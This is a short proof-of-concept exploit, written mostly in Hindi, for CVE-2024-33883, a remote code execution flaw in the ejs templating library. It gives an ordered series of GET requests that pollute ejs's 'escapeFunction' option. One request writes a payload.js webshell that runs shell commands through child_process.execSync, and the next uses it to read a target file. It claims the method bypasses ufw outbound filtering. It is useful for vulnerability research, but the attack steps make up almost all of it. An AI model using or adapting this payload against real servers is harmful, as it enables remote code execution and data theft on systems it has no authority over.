
CVE-2024-33883 का PoC, ejs की RCE भेद्यता।
[email protected] पर आधारित
1. ejs/lib/ejs.js - line 580, 636, 637
1. GET /pollute?target=client&value=1
2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");
3. GET /
- Inject webshell
4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");
5. GET /
- Activate webshell
उपरोक्त PoC ufw फ़ायरवॉल के आउटबाउंड पैकेट ड्रॉप को बायपास कर सकता है।
3.1.10 से नीचे के सभी संस्करण इस प्रकार के हमले के लिए असुरक्षित हैं।
यह एक RCE भेद्यता है, और इसे लाइव सर्वर पर दुरुपयोग न करें।